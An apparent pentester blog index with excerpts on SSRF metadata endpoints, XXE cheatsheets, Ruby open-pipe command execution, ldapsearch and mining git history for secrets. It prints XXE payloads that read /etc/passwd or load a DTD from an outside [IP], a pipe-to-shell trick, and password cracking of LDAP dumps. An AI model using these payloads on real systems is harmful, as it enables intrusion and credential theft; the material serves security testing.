Cloud Metadata URL List

I landed the SSRF Cloud Metadata technique in a few different scenarios recently. If you haven’t seen the talk BHUSA 2014 - Bringing a Machete to the Amazon I recommend it.

To make life a little easier I created a living URL list of metadata endpoints, broken down by cloud provider. There are a few more than he discusses in the talk, but it still has work to go. Submit a PR if you see some missing.

XML Entity Cheatsheet - Updated

An XML Entity testing cheatsheet. This is an updated version with nokogiri tests removed, just (X)XE notes.

XML Declaration(s):

<?xml version="1.0" standalone="no"?>
<?xml version="1.0" standalone="yes"?>

Vanilla entity test:

<!DOCTYPE root [<!ENTITY post "1">]><root>&post;</root>

SYSTEM entity test (xxe):

<!DOCTYPE root [<!ENTITY post SYSTEM "file:///etc/passwd">]>

Parameter Entity. One of the benefits is that a parameter entity is automatically expanded inside the DOCTYPE:

<!DOCTYPE root [<!ENTITY % dtd SYSTEM "http://[IP]/some.dtd">%dtd]>

Should be illegal per XML specs but I've seen it work, also useful for DoS:
<!DOCTYPE root [<!ENTITY % dtd SYSTEM "http://[IP]/some.dtd"><!ENTITY % a "test %dtd">]>

Combined Entity and Parameter Entity:

Blackhat 2015 Arsenal

Last month at Blackhat Arsenal 2015, Pete and I presented on Serpico. This was our second time at Arsenal. Yet again, awesome people, great venue, and overall a highlight for me of BH/DC/LV. We got some excellent feedback on the project, so thank you to anyone who stopped by.

Last year I posted the top 3 feature requests and we squashed them (woot!). These are the requested features/bugs this year and their associated issues on GitHub:

Simple Ruby Exec with Open and Pipe

I was researching something else and thought this was a cool way to execute a command through the open method in ruby:

open("|[CMD]")

The key is starting the string passed to open with a pipe character. For example,

open("|ls")

Or to exec and print the result in one line:

open("|ls").each {|out| puts out }

Not sure where I saw it originally, but this is an interesting older read: https://devver.wordpress.com/2009/06/30/a-dozen-or-so-ways-to-start-sub-processes-in-ruby-part-1/

Exploiting XXE Vulnerabilities in OXML Documents - Part 1

OXML is a common document format; think docx (Microsoft Word document), pptx (Microsoft PowerPoint presentation), xlsx (Excel spreadsheet), etc.

An OXML document is a zip file containing XML files and any media files. When the document is rendered, the rendering library unzips the document and then parses the contained XML files. The order in which the XML files are parsed, and which files take precedence over the others, depends on the type of document. The following link is from Microsoft on the XML structure in Office 2007 files: File format structure

ldapsearch notes

I seem to find open LDAP servers on the Internet more often than I should. Here are some notes on using ldapsearch.

Installing ldapsearch on Ubuntu

apt-get install ldap-utils

Root-DSE object

nmap includes a script to gather info from an LDAP root DSE object (http://nmap.org/nsedoc/scripts/ldap-rootdse.html). We can also use ldapsearch to test:

ldapsearch -p [PORT] -x -b "" -s base 'objectclass=*' -h [IP]

Open LDAP server

Connect to an open LDAP server; John the Ripper can be used to crack passwords that are returned:

Search all Github Repositories for an Organization

gumbler is a script I wrote to search through git commits, introduced in the blog post “Searching Through Git Commits”. Recently I wanted to run Gumbler across all repositories for an organization; the steps are discussed below.

First, we need to grab a list of repositories for the organization. This can be done using the GitHub API:

curl "https://api.github.com/orgs/[ORG NAME]/repos?page=1&per_page=10000" > repos.json
curl "https://api.github.com/orgs/[ORG NAME]/repos?page=2&per_page=10000" >> repos.json
...

Note: the API limits the number of results returned per request, so you will want to increment the page number until no more repositories are returned to make sure you get them all.

Searching Through Git Commits

gumbler is a script I wrote to search through git commits. Examples from GitHub are discussed below.

.gitignore

A .gitignore file is used to specify files that should not be tracked by git (source: gitignore). In the default case, gumbler will read the .gitignore file for the project and search every revision for a case where a file listed in .gitignore was committed. Possible use cases would be a pen tester looking for reconnaissance data (e.g. developer usernames/passwords, staging hosts/services, etc.) or a developer verifying that projects did not previously commit “secret” data.

XML Entity Cheatsheet

An XML Entity testing cheatsheet. Testing was done using an older vulnerable version of nokogiri. In IRB you can require previous versions of gems. Certain techniques (e.g. XInclude) may require additional settings in Nokogiri.

XML Headers:

<?xml version="1.0" standalone="no"?>
<?xml version="1.0" standalone="yes"?>

Vanilla entity test:

<!DOCTYPE root [<!ENTITY post "1">]><root>&post;</root>

SYSTEM entity test (xxe):

<!DOCTYPE root [<!ENTITY post SYSTEM "file:///etc/passwd">]>
e.g.
doc = Nokogiri::XML("<!DOCTYPE root [ <!ENTITY spl SYSTEM \"file:///etc/passwd\"> ]>\n<a>&spl;</a>")
doc.children.children.children.text

Parameter Entity Test. One of the benefits is that a parameter entity is automatically expanded inside the DOCTYPE:

IPv6 DNS Guessing Notes

A hostname with an IPv6 address is stored as an AAAA resource record in DNS (see AAAA record). There are many DNS hostname bruteforcing tools; personally I like Fierce. Suppose we have already run our hostname bruteforcing tool against a target domain (e.g. facebook.com). Below we use dig to do an AAAA record lookup for each hostname. Note that the DNS server we use matters: in this example we use 8.8.8.8; to confirm different results, try using a.ns.facebook.com instead. host can also be used instead of dig: